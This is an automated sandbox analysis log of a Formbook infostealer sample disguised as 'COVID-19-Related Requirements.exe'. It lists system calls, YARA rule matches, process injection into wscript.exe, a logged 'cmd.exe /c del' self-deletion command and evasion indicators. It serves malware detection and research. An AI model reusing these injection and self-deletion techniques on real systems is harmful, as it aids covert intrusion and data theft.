Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B0A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09B00 NtSetValueKey,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09A10 NtQuerySection,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B095F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B0AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09560 NtWriteFile,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B0A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B0A770 NtOpenThread,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09770 NtSetInformationFile,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09760 NtOpenProcess,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B096D0 NtCreateKey,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Code function: 15_2_01B09650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DE95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2A060 NtClose,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2A110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B29FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B29F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B29FDC NtReadFile,
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FC194
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FEB28
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FEB38
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041E85C
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00401030
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041E17E
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D189
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D587
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00402D88
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00402D90
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00409E40
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00402FB0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE4120
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ACF900
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF20A0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B920A8
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADB090
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B928EC
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9E824
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B81002
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AFEBB0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B803DA
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8DBD2
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B92B28
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B922AE
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AF2581
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01ADD5E0
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B925DD
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AC0D20
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B92D07
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B91D55
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AD841F
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8D466
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B91FF1
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B9DFCE
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B92EF7
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01AE6E30
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B8D616
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6D466
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DB841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E725DD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBD5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD2581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E71D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E72D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DA0D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E72EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC6E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6D616
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E71FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7DFCE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E728EC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DBB090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E720A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DD20A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E7E824
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E61002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DAF900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DC4120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E722AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E6DBD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DDEBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04E72B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2E85C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2E17E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B12D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B12D88
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B19E40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B12FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 04DAB150 appears 35 times
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: String function: 01ACB150 appears 35 times
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.430989730.0000000000F64000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433207699.0000000003333000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWindowsNetwork.dll> vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.433207699.0000000003333000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.448500832.0000000007780000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 00000001.00000002.432940661.0000000003291000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000D.00000000.427927529.00000000003C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000E.00000002.429267857.00000000002B4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000F.00000002.487052680.0000000001BBF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000F.00000000.429960231.0000000000FB4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exeBinary or memory string: OriginalFilenameCo2vKXXLQkGY.exe@ vs COVID-19-Related Requirements.exe
          Source: COVID-19-Related Requirements.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.597531412.0000000002F80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.597396184.0000000002F50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000013.00000002.596048220.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.COVID-19-Related Requirements.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: COVID-19-Related Requirements.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: COVID-19-Related Requirements.exe, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.0.COVID-19-Related Requirements.exe.ef0000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 1.2.COVID-19-Related Requirements.exe.ef0000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 13.0.COVID-19-Related Requirements.exe.350000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 13.2.COVID-19-Related Requirements.exe.350000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 14.0.COVID-19-Related Requirements.exe.240000.0.unpack, Reboot_IMG/AreaCaptureForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/1@1/1
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COVID-19-Related Requirements.exe.logJump to behavior
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeMutant created: \Sessions\1\BaseNamedObjects\KggIKjEuKlfWFkr
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_01
          Source: COVID-19-Related Requirements.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: COVID-19-Related Requirements.exeVirustotal: Detection: 23%
          Source: COVID-19-Related Requirements.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeFile read: C:\Users\user\Desktop\COVID-19-Related Requirements.exe:Zone.IdentifierJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeProcess created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: COVID-19-Related Requirements.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: COVID-19-Related Requirements.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: COVID-19-Related Requirements.exe, 0000000F.00000002.485261731.0000000001AA0000.00000040.00000001.sdmp, wscript.exe, 00000013.00000002.598596904.0000000004E9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: COVID-19-Related Requirements.exe, wscript.exe
          Source: Binary string: wscript.pdb source: COVID-19-Related Requirements.exe, 0000000F.00000002.485075034.00000000019E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.460588172.0000000007CA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_00EF6EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 1_2_018FE4E8 pushad ; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 13_2_00356EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 14_2_00246EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041687A push ebp; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_004048E6 push ebx; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_004164BA pushfd ; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_004165A3 push ds; iretd
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_0041A5B5 push eax; retf
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00416FEF push edi; iretd
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_00F46EF1 push cs; ret
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeCode function: 15_2_01B1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_04DFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D085 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B148E6 push ebx; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D0DB push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2687A push ebp; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2D13C push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B264BA pushfd ; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B2A5B5 push eax; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B265A3 push ds; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 19_2_00B26FEF push edi; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.94983598919

Hooking and other Techniques for Hiding and Protection:

